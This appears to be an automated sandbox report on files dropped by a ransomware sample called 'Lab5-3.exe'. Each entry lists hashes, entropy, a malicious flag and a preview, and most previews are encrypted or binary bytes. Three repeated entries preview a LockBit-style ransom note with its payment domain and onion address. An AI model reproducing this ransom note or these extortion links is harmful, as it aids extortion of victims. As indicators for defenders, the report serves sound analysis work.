                                                                                                          Preview:."o'.[..i.S..1..Y..1.d+q#.....O.T....?Np.^...;.U(....h...*......R.H.n6..Bo..g@.k..Z..*..;F.s........]VH.l9.V=.u1.]H....."...U.J:..8U$cm..iaN.<....O...9$...].....O/b.S...F...f.`..v..@Z....h........d=.....H.25.9;.`mQ. ..0.7......7.5(...t.w.q..O.I...%..Z*<....U./....w..'.)8=...,.*Q+..Q.m.."o..a...D.....3.=....:[U..V.4.....v.8.42...z...sb(ab3.H.2q...R..L....hnD.....F....s.M...T.O.]...&l.5.Z..D)...<...P.J~`>;.oW..]? .R'....[x.z....dC..H..........k..^2..p.[..w.3.1[...!.o..~C..hYiI2..(.s..b..G:........_BO_...Np.Z..9A..3.`\................s=....y1(...z. W............U]....\...n..t|...(..E...m.sI....W......OO,.C...*2En|..[.....B.+.r...%o....Dp..;.`..}.*M..L.X....ib.5..q.u..lr(..(.,.....o|U..#bEZ(AB..s.8.;...Y9%..;..Y..v.cNS.....;..7.....I.g.....|o..R6....Y....~......u@v....PuByn...j[]V..Q;.....}...&\R.i.ng....q.BNm..x..c..P.J..U..7.S...r^.@x2....=....B8*..[...h.='.=....b(|.BQ.z....!.c....Y.UA..........hE..Q.}....<.7.-..........^.+(h'.....s.'.[qz
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2560
                                                                                                          Entropy (8bit):7.929458753549079
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:gKCLDwVDdtrZRM1tJTMHfUTid3hBaUoSGFcmeykEdEElU92i:gKCoVDnZi1t9Gx0uKeY2ElUJ
                                                                                                          MD5:5B95F861B3119F763653BA29B01C76C1
                                                                                                          SHA1:7BBB5302E90E7E35D6213FAD1E8E80F267CA6FB6
                                                                                                          SHA-256:57A6FAC1BCD07FBBA04F421AD9A6D5BC6FA8C60CCC42193213BAE53B46E43D52
                                                                                                          SHA-512:FCCBC9B75AB30EE521F0E8FC6A1C7421C9C37D9E73B57E3E1774D014B936DFF6FB78F1D28CAB63B384EE384FF2ADB17CF9358D883BAC0EEBD4116A29666A0CA5
                                                                                                          Malicious:false
                                                                                                          Preview:..nW.k1..f7W.y....... .b..`.......a..L5.SQ9.S.qx..l..E..y...2.k...W....`..../N-;X.x$...5=_].....p...C.S<...%m..V..l..d..x.z!.. o9....5.b......HJ.bC.2F.+...|J=..8.N^G.i.....s......6..G....w8H-;!Q..1..+..M.>%.;Su..2q.....2.o3.t".......P.][.T........)U..@2...o.4....F...HhS..7M.......\...o.!.'....}.'.v..S...9H.`.D. BM...Npz.....(s.o......n..0.bm...k.IC1l..\..OZz...H+..&.q......(,.S.-,......G....i....1]..\2kb.W!#H...uSw.$..?=Nt.......u....~.\.\.lD...O.D..9.^..@v.....-..~!.\)...gTt$...Ygy..Js...T..(..JKOy.#.....P+dM:......(Z..h.4.H..f...K..'......?.fZV_......&.Rz1_i..".8..i.......eo.2...]...3........[....KT.7......m=..........Saz5H...a1.O|<z*=.......m..R/.V~n..-.c.M..2Z.iN.5......oq...P.....[.$....@d!...f.i...Y.K...8K..gIG?..g.E...D..p(o4^ ...=....2.<.N.%.:v...r..9...#.l|._.r|..Ce..F...i....aE.W..;...1*..N.@...k.o.".Z.q.}...e_.|,.Q]..*.{..r.....n.fo.....'.$.,.....aw....q..aq."6).+..g.W...5....EN*..7...htQ...4.g.........\P@...ZM....H[..j.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1936
                                                                                                          Entropy (8bit):7.9153209511927605
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ttRSCG8NQUOrirRr5V7OHfUTid3hBaUoSGFcmeykEdEElU92i:ttRSUOrirxbhGx0uKeY2ElUJ
                                                                                                          MD5:02E2FA18978C69D8DD808235CD2C39E6
                                                                                                          SHA1:DAAFE45FF8D1258FBBDF2FFD3F6956E0C3D57329
                                                                                                          SHA-256:80041C640A0A099AC5B3D7EA30B993B788E995920A5DD3820FF3E1584BD9FAFD
                                                                                                          SHA-512:416E2DA75CF79DC02BB32F248DCE767C3BDA2F67FE09668E7646FA82E57156A46963B502E9A35437E01A761D75BA6DFC53D1CD1A7C64D7D84D2FED0B430A1EE6
                                                                                                          Malicious:false
                                                                                                          Preview:u.}...5.<9oO.T!.+..&...nW...r:H...Y.T...T....c.p(...38.K].nr..p......vBv5.0.a.V.R.8.wn........bf.."7FL8...@F.).<Y....=KF@..l..r....r@/.f.i.D.2..m.u.]'.....I.E..........2..2. %...1....,..G.8|..k.3.:i...E........8..&.\.n.....@..G.oU...*.l..+<$...B...ZL2.R.<T....<......2....`=2.~.-!}.......1.......T.>..d".Oz..T5.B....E...\..$.9.......'.&<...f:".i.X.."..JE.L4h,.0.m...n.h....x1.......e`'x..h\..nXUc..E\h......E(&..e..tL.q8.....>.:RQ...p......s2.c..X.c....A......~.[<G}.n.Y..n.....U3....N......:+X.E...~=.Iq..4.j.P.t;E.P...>..-=...1t..[...Cs....q}(.%..:..=.N....`o...@..W&.......ra95L.....qa..k.^...kE@|. .F.|u....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):138656
                                                                                                          Entropy (8bit):7.998503915507396
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:phPgTj21cOM0UvVTgb9vW+Y0VQ/hpC1IMox/86GDS0c9g/Z:bij2t2VTst3Q/nvM2E6GDS0j/Z
                                                                                                          MD5:7BF18D7F24B29EA8290E7EE585459556
                                                                                                          SHA1:29B8963717A3BE488857F6001D8B8616061AD315
                                                                                                          SHA-256:16D8918873CF316BC096D80F6C6CB38A03F98B33D6D409E041E2F690EA9AF73D
                                                                                                          SHA-512:AB6A523824AE64E174AAE517853CBE427293FDDE5A42049A6FC7B163A7AA5848C5AF8F3F295BE89CC4CEA33FA24FD8F026CB9B9BEB766D612F1557B84CD94054
                                                                                                          Malicious:true
                                                                                                          Preview:^O..v.P#6....*nE..g.4e...._.<23.v...V ....)+.]@...U .3.7:.^0q.a....=Zaqjd ...n...nH..[..s.U.*a{../.a.*..e...U..s..?.0......-..=.`>.....PdW...s.q...'.g.D~.aTLn#......Y.GC'/..a./jN.......Mh..GAE..g.[....J.1....3.Z...]..EP`hG;..fa.:!(..h..e<ZV?....E.X..;4.M.,b.I..~\ W...{........5.vq.y...!.|...L.....vg.@I&".,.5..dO2)..WF...-.7M.<.....0...{t..c.b.nl....8..h*..3'....-X..j......}|5..L....2Q.&i..F.M.:..&....S.X.9...;%.5.#.5F}>.[...../T.J>.+V.o...A.tnT..r....0..s...ty...P...t...`...`.}>.P*,xJS.;.......i}..s.!.....,..p....:&...R.h.[B"..[.=..t.Wh.nS....8.Up.K...lui............T..(6.......>.d.p..L|.I.8..9...+.+.Q#...V:....2..5....*=..;.*......''...&.Q.......p.K=c....9..$.2...D.....=.+j....b.]4.&._.i..<.UI.....6......iY..6...nP(.......Q~)..D......c..+.!zO[......F.P.?.[..%j...X.......E.._x.p..d..D.a.ZA..F``c6fh.<}.s....S+.Y.S[c....9..Y..J.O.q..u).A.d..0.'..O...$.E...Me.6....."..`.<...LP.....Pf.p:..?.m3..].......:.R.G....u...5.?}.._wW.Am..>yD&....$t8.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):288952
                                                                                                          Entropy (8bit):7.78679973463607
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:YPn3y8vqXq6M+9CiN9670gVxQSeLc7Q9+iRjeReov9kO4Z:YPnzvqa6ZBN967zVxgc7Q5QRpm
                                                                                                          MD5:85419CDE9C8A64254824E0C346CCAAF8
                                                                                                          SHA1:7778A69F6E8A5A17A99A0331C88EE4F67EB946FB
                                                                                                          SHA-256:F12EA06FBBBD5C8C12C575F94AAA86B0B6C256EAFD0F5B0199D5FFE54CB49DB9
                                                                                                          SHA-512:6E5AF71B37511FC2510F9462AF145EA94AC74E287C9C3C9DF18540112B3734582103E9B9FFF161E9D08BCC9FA5244608A63450A1CB7A578F64E756C4FC7F7306
                                                                                                          Malicious:false
                                                                                                          Preview:Cg...23...Ls=..`.,..S..Z...G.0.....p..k.M.=S..b.....dv...e............6.c.....A...l.f..4z.w.0.6g&.(dl........i2...$......s.MA|?.....l`3...3W..-...oU.t<.E;g^.N.(R.^c.1....Y.3}.....!.xC.Tk../....l..........%..#.2......`.$..'.....Uo+Ln!s....^v....e.b.'.5f2C?..nX&....IlB..E.9<..G..b...'[\..dS:.....)j...U.!/.B.%..0 .^Z...9!.p..4@..[.%...s.;...@.Bor.....V.....6..@..r.....@.G...NZ.9M..*..X..n1.".Ke}u....v.~..Q,x.%.g...Xr...6.....Ol.o2u>.."..E....o...]...~Un"Y..J.+..c.N.......eQ;....A?.!...MG&.7..u:./.%....h..sw...G......s.).w.r.S.Y..yD.........M.f..".v.E.5"1.h.QwS.E..%.........1G>.J...H.'.7....J..B.J.'...C.>_.C..`$.4...onu.!<7(.#].x.8....b.......Z.Ez=..:.......K.........[....R.."""R6.....^.}......k..'...|..m...xi.6%.n.g...Y.......cJ.,.M.......1.0....._.r.(.,.$1p..7.U.....EZR.C.h.`l......F.0..]...g}d..u...U.Q...B..VlSlS.u........uE..{p.>...bOr.m..&.o..8.|...GQ"Y7.#F.pJ.;.\.-..q0..z.......~.......X..1b.67..:.2...Oy...).B@6...!..Jza.../.7t;.+.@..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):181920
                                                                                                          Entropy (8bit):7.998908663727551
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:4W2/pwy/tGs08bzZNdHnfLu4e3RBcNvtOfaRkO441wfD9VPdA6UeG9Z:92/XjB/De3RB2Ia7u5VPZUJ9Z
                                                                                                          MD5:223AE020E9AED2592FB8C13319B6864F
                                                                                                          SHA1:5FBAC7D75E3C89A82F0CF9E8D943FDA7704F339E
                                                                                                          SHA-256:8B78CA21198AE81ABEB54E7809151CD631DCB3339CFCB0EDCF1A45E4C31CFFAC
                                                                                                          SHA-512:20B52BA79C166F8ECA1E7DB3F3002085AD5708BC31F698F5B86768CF2D89FBAF59BFB9A2E2490E3E8E57F0A839A51A431599FF37268D677E057DA4BF983FEA4D
                                                                                                          Malicious:true
                                                                                                          Preview:......V....@t..0v{.Yj....h.Z .....;...".q..{yHI.<.... .....A6.zAF......Ih....(......W.c.....,R.9|k..Q.5]..l?.b.....J1....a.......&E.....x.#...(0.......g..OW... ...(..}..g...u.f.........NGx z6.c...8.pLe..c%&....K%ysY.N.)?-.Sw...l...n.cQ..MI.~.......]..L.Q.a..y.?A.j.'.Z..v.....h.8.>..."Z.j.............d.E.>A^4.!{.......Z..JG..d)z.C.......-Sw|.9.3.......R...h_`C....#.]..SG.7.H@$...e.r..#.p..v.PD...K.dn.(.Iu..cETw..o.2.DT..6..`f.g...Cjr.Q.K.l).~.a.{.oT......?.J.q..."*%i......i;,...o.%.8..z&u..@.u.-..)...|.=.S..!..~~...)52..XJ..ri.Es..NR......x.%~8.3...v...#.7.......&..X/..$....*M...2S.{./'..|.....VA.} ..Z5.{.....1.s.&..G..'q.=.....o....`a..1@k.GF>WO.k.M..ylK.v1..$A...g.u=.....\...v0..V.t.....]J.P.<.s.b...E4:.8..z.C.F./-<.p..N..u..Y1...X.Na.7..7..u..;....Ue.#.cb>..K...U...s...& .......0...b........V.@r....KT&I.M..A...(..m.hcB..P.0...?..Io%.t..P.L.n.)......n..)./.......L....$.=#.wT&6......N<..g..Q....;.]..@...f......4?..&._.>.....4../U..M...<|....."B.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):178896
                                                                                                          Entropy (8bit):7.999082369166306
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:jY25q9Xb5B9A+q7Dmx2PxrbxfZiFGspCDuGNPyJOnoTVjkYdTr4O+CZ:jYeqZ5g+M7lRiUwCSGNFoJjvBF7Z
                                                                                                          MD5:EF42DEDEFA0B794B773818719CF0B297
                                                                                                          SHA1:639462761EE52C25BB30FAF499D9DCF3A32746BB
                                                                                                          SHA-256:EDDF3D3466842A3129D37A357F2E4A94A0DCCDE5079D74181671B68112222A15
                                                                                                          SHA-512:6576C949BD9BB1515D456CAA2322694AE05EBA09F08EBA0101A4BE8054008B3A37124111E15269AAB7F87B6D0A5256F2A348991D4CC79B84B97D3057603BBFDE
                                                                                                          Malicious:true
                                                                                                          Preview:3.....k.$....V..&TMn...}K$.$..P...9' ...?.y...T.e.y.m..)1a......D....Q<.l/P.&.Csh7?'...bJc`....n....q,.o.0w>W.%../W..Wp>...'.f.....ino..t.#g.n....O..$/..-h..e....C.H.afI.1..E9..[...Z.>..?....*.s...S.K|..X...j..(....4eE..3'T;V...!4..a.-q.j.!.Db..m|..?U..C.]..M...w....q....h/\L.C....L'.`'.f..Y..Q.."H*CC...y./....n.a....Y..0#...4...Qn.......q.&.K......p.?1F,..'\.....G....P...Jo3:~.s.....1t.s.}-.o....B~...e.<\...9.T..2.A+E(h.,..}E.|....P.+$(y....+......$...k.k.m....dv...?.G..{.z.I.u.`.z..X...x.B..o...x..W..........P.e.+....."....+.C.v'p.\.....I}...p....N....T.c...8..:..Hh.Nei.h.g.&.$..c-.D.NBi.gf...n5...!.~.G.0...>......D...L.R........C.W.Y.D..].C=.V.n....b.AmO..}J.,.^.u....}=..O.v.W;.k[....z..j..R.+E...DWS..'....%.+`.a.\b....O..l..y4K..?..;.R.>...T.;,.rX^.H..\....V.....rFLS..l...k.........}.........B&..u..FF..@....j'..|J..x6=..B.......+._.....F.A[oi..5m.*..H.]y.....q.Q.U.?r..`.6...U. ..}.\.B.Kg.Y.i..P/c..a.".......~|..v......F...I@c...-.4.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):282056
                                                                                                          Entropy (8bit):7.880909099952932
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:jzNfXJsUqAeeD2dQ6g93oPsn5/I5mohwod5ElLVw3lOX00fUZ:jlSZeD2S6gpo0c1aodClLV2w00A
                                                                                                          MD5:849C0D5A29EFD931EE4410B86A45ADD8
                                                                                                          SHA1:C2161ADDB4C59BA80DC176F2A6E64A21DA0B59D4
                                                                                                          SHA-256:F297827E1F48BA58D054FE5D85BC84C292936E2FD8AD8D297501E09463B3B1DF
                                                                                                          SHA-512:E250A573F9E8280ECFCAD7E90BAE233223FCBCD98586A2493469F1995A6152BE804D11C112488BAD006C3F4CC2300A244662119DA6B0E589B175C75C3AEEAD5E
                                                                                                          Malicious:false
                                                                                                          Preview:`....jP.....t.4h..._..&.v..\.$..w.6..A.......I.}f.S../b.gd..t...-;g...3uo....t.a@.....c.f...*.....l.m*.z.(.....[..$..u....C...).tT$ne.h...d6....#.f..OC=i..,.:.y~.&E..a.V)PrT.uqY.......d.<&c..........T~..,,)....o...P._..]...../Eu;.q....v...5..>.hL.0.....e5.%..5......j{..1D=%.....(F2.2...&K6>.U...T.A.[..b..][..$..'..3J].....(T....:Ft|,,.....e.s.U.I.T.M..."...cJ..C.$...........K.DW9!.D....Tv.E...0.%.....V.,N)....R{P.P<..g..:X..,".2C\r...tIs.e....Qo.0\?./..'f.w........DH..%...y..-....)...J.i...`.9..._.U..2&..lq(.$t.A..6o.-K..`0C.....Yr.(xs.&\...#0........F.+#C.W..X.?.. .w)..<.<.}.. 92......!8...,..>AQ&..\..yt7..`.*.....d........2.?./LF....Uv.{.._.5Ih..y.....i.hP.i.*.=.m.19....d../{.j..$*N|T:..U.?`.....?j.!....[....#..A...PM.O..WDT...1.=.Q...ShK..Ff~E....tn..}`.j.?$T..b.i...<,.m%.k-F....$...r)...u..\..Q..G.m+..K.E.5./2..uh......2*.Q...A...?.A...4,:.7.t..V......A....5&Q.7...X+...!5P.WF..........4..V...+.J.V...Yaz/d.KBjq.v......27yq....U._.:..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):179008
                                                                                                          Entropy (8bit):7.998900393794948
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:Zmx379ZHaOS036ygv6qK6FwQw5Nbo14P727FY8eGJrWceBV9fe8DGzZ:Zy79laB0q9v6qRFuDbo14j25Y8eGJrSq
                                                                                                          MD5:6944A2BD6A60C1A1E76F4B41FE1ED9CA
                                                                                                          SHA1:D7970A18FF198E13EC1EF23FF7F55E08B295F86A
                                                                                                          SHA-256:36D350B823BF3EB1F18BF673B45A7E4EDD4E8F89C94C367015508CABB3B45B21
                                                                                                          SHA-512:A45EA5F3F2D8544313A2D4CC72BFE5329BC41161E4D1CF1FE1433B5F366AAE148FDC4E4F60EC625D253258E3965A505F7F028735538656732D2E3ACCE81819EF
                                                                                                          Malicious:true
                                                                                                          Preview:...u}....j9..#'..Ug...#W..t..%..+D.9.Z.o.,.%;.]DW8487....+..v.\6-...m0..WWEQ.C.#.<..2..1..(..8..^.l.mR.;pZ../.}$...n,..5".|.#..._.%........Moy.._N|..v......\.9b.. .K.....`..o ..J........!..F?I...mB.{......Ktl]..-H..[h.q?.;e7..u.w.y.... .....!.Lq....X......v.]I..<.iP.K....f...4.`.[.....%"..._ ...k!....$..v.!.......-...Z............].ZpK.....v.l6.?....f^.j.......L...:.tN.'...Oo...,f.....|_U...../.......Z.j..N..I>i7..0-}.Lm./.p....P....&.w..N.8..d..kC.?..}.."..b.Q......>3...E.q...'.I...6+........~4.5.O..b..XW\"..^...i.G.y.J.......m..2..X.z.iG...7.c..ku............AH..s..../.Wd.....'@.Na.....A.XGU..a.V:.en....H.5!y..L..J-...$-!.r%..2.......4zG..5Z........rn1{...}....ICb...1..Lw8...G....~.1T.B...A.U.u..m......WV.(x.C.kLg.U.z...X..F.qQ[..5k:..^G>.........{..r.(%.;..[.....b=t..W.N.Q4m....X......@.Gdx..8.....5...l.x....".o...]..&YB.@Y...;.i.!..h....9.c...3..k...(C..S.[..[...#.x...E.1.\.60.w. ..FF..w.q0...A..............n2-}..xm(5.=....3.@u
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):284464
                                                                                                          Entropy (8bit):7.839255521444758
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:IHXtb2cyeaMZ6rumc5+dCfH/MIml/1+96n/Z:mzerumc0d0kzHkiB
                                                                                                          MD5:1222078F1BC04A5A448E949A3800C07B
                                                                                                          SHA1:042856146C56354208B075B4741AA902A8EDE432
                                                                                                          SHA-256:23FA572AAF4FBF2933C4AC10C478C095AB637A95F9A4EB9A6F8405F2DDCDE77E
                                                                                                          SHA-512:0EA654CD9EFE15FE6A21764B9B23CBDB4328EC690BB09204BAD58FA70D912BE954037914C0D11B53DFCAADE29FCB0EC07684F0FF5D6EA2FEB99252C99EE47F46
                                                                                                          Malicious:false
                                                                                                          Preview:..M.9..9...?.Qrm...g>.......*u.vF.UG.<..7.C.:..<...k......(...fo.....>.o=.......J.....W..5....$.....ZJ...`....P..M.E....f]G...1.....M@..F...OS.U..F.M....*....O..HHo..V.....~5.........../-y..h...l`C.8a...b.<e.......Y?...2..B. ...F..N59. hc5.-u.:.J..n.~.V.....H.F..(........z5..G.c.e$..B.w/2.'..{.6.W...|.NH.%}./.U.,)q....m.<.&A.$...lKat1B.6...$.._.,,... `..BB..Z..s....VV...i.....jw....VR._.MN.-K..Vi.CN.,q..w.:.&.}.9...U.q...{......k..HE.}........]..2kN.....-04S/..~.TXMKG....._..2.........7.1..V.........c...x..`&}..F)O..L.AT.m..3w.[.Z.H/\.^..J../..?P2..og.$.5A.mr......M.sw..(.....(<..;......%.)b.....C}.f..{/.r.$.MC..hn.w...[kBrk.f..s.-".h......v./y..A*..$.)P>xL..O....Pt9...u.U.g...9.S....O.n..8M;../......".d~.......U%...Pe)....V...4W'..)p.W4.>.......OXF.[).Y(`c........c..._.~gS.r^...5....G..5......<D....>U..1...3XY.....+..).o.....j&D.!.L.X...jK..f5.._e."2Tm.kWN...B[Q.....t..%.E3U./...6..I..tt;..?`..X.U$.Q...#.....zN.e.Q..).D.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):180752
                                                                                                          Entropy (8bit):7.9989185507545155
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:b7RQn4qF9PeniBBe0KkLX3/umdpisTh4h7n/cz2fpICxP2N4qWvdFxUUV/eZZ:hUnF92niveULX/k7742fpxPq0dFmVZZ
                                                                                                          MD5:4AFE0AE5EEB56105EC89A4F3DA0329DC
                                                                                                          SHA1:388A5339A89FEAE69687B4FF95D0A6BB8C86D47B
                                                                                                          SHA-256:C2080E1C4CC7A5AC0D4C3D16E6FF99CCA6CBF59CE8A146D632555F3A6699D591
                                                                                                          SHA-512:DB84A32813850D1E2C3CC4062A66BAF3AE4A3363DC17E1CFDD1D7B2B26CE8F0A2CC829D1561D7A65E91665F17681E64841D49941C3E1344AD2A9E76C6AB12A61
                                                                                                          Malicious:true
                                                                                                          Preview:....fe.Ni...R..S.....y.8{..70....Y>]R..De......`.!.C.,.pQp..:.f.K.*.......\6.."...*wD..4...!K..w.U..<.,._...Do .....D.[p..tV...).[...1..5[."...d..m{.D.J6F..L...G.(.....L..O.3\..G.C.....}.3..D..~G....D....0.....U....U...F.A..".E.Z....F..@...;.B]E<...\....t....#.Tp%.....9;82.FQ.....]...<-.bv..,G.<.Z...<9..]..I...4U..+..}....Ept......n...@X.....s2..d4.^.<..9.kJki*o...dW......0..g/jl.E..v.h.C..Y7....4-....|..]....*g..P3.......`..6...../..4Q..).$.H.zd@.:B....!'.(....t.....0..&.P....[E......O..,..Rc...M.s....:....%.y\.c9.P...6}....s..MH....|4.o..I.E.I..9A..RaJ.......F.....ZE......S"p.v..c..7....d..._.......u..XA.?Hu..n...".{J.......Wjb...6d5Ar.=.v...V...).N....6....B.. %..;[...^:.q8..u.....Dr.5[\G.2../~...1.)4....e`LZZe.X..`9.S.p*.-b...'.X/=Pw.M.....[....@ .w.$&...7..E.s...M^.=.@.4.Wk...h.ZM.W..&.8.7....4.....y..p.K\fP..x....G\'.T{L=D...C..Z.'....B...}....1\..WGW.+.mQ6n5Y>p..3]...q...@d.C..,....0.r...,..).e.!..Rg........n.y....A..).l.J.....'
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):281664
                                                                                                          Entropy (8bit):7.871180934309685
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:olGVV+wswhcMQFh1IthbyBbj2XyxvSSss3vqBzFZ7DGnaceAsOlYZ:NDzsLwHyBbj2CxT3vqBzF5/7
                                                                                                          MD5:F89A1B0936E7FD5B70FDB0252232AF92
                                                                                                          SHA1:5F88E8177C7C6B0A452AA70AFEE130C0F6A15C1B
                                                                                                          SHA-256:8123536DEFDCC100423A0A36226BC862E09BDE15570FBF439E816B56B6812F60
                                                                                                          SHA-512:D4CCB13EC0E54F3F62EC562E25718A4E5FD9C1670D0D92F7D406B317DFF041F738349F5FDCF20BC964BEE254019E552EBF9CE664656C8C36377EE84FC3D7FCED
                                                                                                          Malicious:false
